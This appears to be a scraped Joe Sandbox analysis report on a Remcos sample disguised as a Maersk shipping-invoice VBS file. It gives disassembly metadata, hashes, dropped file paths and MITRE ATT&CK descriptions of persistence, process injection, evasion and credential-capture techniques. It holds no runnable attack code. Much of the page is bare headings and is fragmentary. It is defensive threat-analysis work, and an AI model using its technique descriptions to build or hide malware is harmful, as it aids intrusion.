String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: de59fdec9958a80cb28107aac808499ecd4d5e56271bcee8edd1ca3305eb5638
Instruction ID: 7122f5c4cf6e477580832b0bfc5a319c9cb4db7bfc1e4556bfafc90d14832d10
Opcode Fuzzy Hash: de59fdec9958a80cb28107aac808499ecd4d5e56271bcee8edd1ca3305eb5638
Instruction Fuzzy Hash: 68815DF37143198FEB158AA9A41167AFBA69FC6210F14807BD509CF691EB36CC85C3B1

Function 073D8EB0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(f&l, xrefs: 073D902F
(f&l, xrefs: 073D9025
(f&l, xrefs: 073D8FB1
(f&l, xrefs: 073D8FA7

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l$(f&l$(f&l
API String ID: 0-3560550811
Opcode ID: 51ab933df6c827254855b33f8ef3da358a5107a065170a0ef8de675731170eaf
Instruction ID: 8473d436285db59bcf28d3ccd79ddce351121a468aa71c0ae0ffd685d9f91667
Opcode Fuzzy Hash: 51ab933df6c827254855b33f8ef3da358a5107a065170a0ef8de675731170eaf
Instruction Fuzzy Hash: 0E7173B1A00209DFDB14DF58E941AAAFBB6FF89310F14C169D8096B755CB32EC81CB91

Function 073D4568 Relevance: 5.1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

Strings

84$l, xrefs: 073D4593
tP^q, xrefs: 073D45FA
tP^q, xrefs: 073D45EE
84$l, xrefs: 073D459F

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 84$l$84$l$tP^q$tP^q
API String ID: 0-4080315626
Opcode ID: fcef65d2f6e8b218de9d45ebc7ed312a2c69149063d3166306a3a838c381e620
Instruction ID: 14c7c1614b4a1f27b40db6c9b801c6fe8596d60bff75e2eae1428010b21b8cb8
Opcode Fuzzy Hash: fcef65d2f6e8b218de9d45ebc7ed312a2c69149063d3166306a3a838c381e620
Instruction Fuzzy Hash: 29418CF2B00295AFD7149BA9E814B26BBE6AF85710F14C46AED49DF381CB31DC44C3A0

Function 073D23A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 073D2410
$^q, xrefs: 073D2404
$^q, xrefs: 073D23BA
$^q, xrefs: 073D23D6

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: edfba6716dc7b65b79c23d96f43d166793a1161da3155a2e31475813e82eca53
Instruction ID: bd35024107229c8a4334ee9b85f83da1482d9838d99e3548ed5f2ce85d6c6d45
Opcode Fuzzy Hash: edfba6716dc7b65b79c23d96f43d166793a1161da3155a2e31475813e82eca53
Instruction Fuzzy Hash: 77213AF371022A5BE724592AAD49B23B6AA7BC0714F24843AED0DCB385CF76CC458271

Function 073D12E8 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D135F
$^q, xrefs: 073D1332
4'^q, xrefs: 073D1353
$^q, xrefs: 073D133E

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: e006516cf5bc8e9017b8bf4c1f728dca5982bc08cb5496a07756e595e52ec54a
Instruction ID: 1aabc7086577437a635444253b79dbb78be1393fa59ca55d84006c475f588df0
Opcode Fuzzy Hash: e006516cf5bc8e9017b8bf4c1f728dca5982bc08cb5496a07756e595e52ec54a
Instruction Fuzzy Hash: AD012661B0D2CA8FD72B03382834115AFB64FC3900B2E009BD085DF66BCE5E8C4A8367

Analysis Process: wab.exePID: 6444, Parent PID: 6540COMMON

Execution Graph

Execution Coverage:	39.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 05445C17 Relevance: 3.1, APIs: 2, Instructions: 78
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000005), ref: 05445C9A

Memory Dump Source

Source File: 0000000A.00000002.2959075340.0000000005192000.00000040.00000400.00020000.00000000.sdmp, Offset: 05192000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5192000_wab.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 723a63405fe8dddcb68b06cf24c937aa68f7459e942ed28fcafd6786dec6a8d7
Instruction ID: 288ecd227f6cbbe845cceb950a7d4c1e8b9f62d2e0e538abbac90a169e2d9bab
Opcode Fuzzy Hash: 723a63405fe8dddcb68b06cf24c937aa68f7459e942ed28fcafd6786dec6a8d7
Instruction Fuzzy Hash: 69216AB16C13009FEB049E358A8CBDA73A2AF153E2F45819ADD528B1E6C325C881CF52

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Maersk_BL_Invoice_Packinglist.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h45yca3z.n0i.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it3jblhk.1tt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywes52nc.utm.psm1

C:\Users\user\AppData\Roaming\Scabrosely.Tor

C:\Users\user\AppData\Roaming\kpburtts.dat

Static File Info

General

Windows Analysis Report
Maersk_BL_Invoice_Packinglist.vbs

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre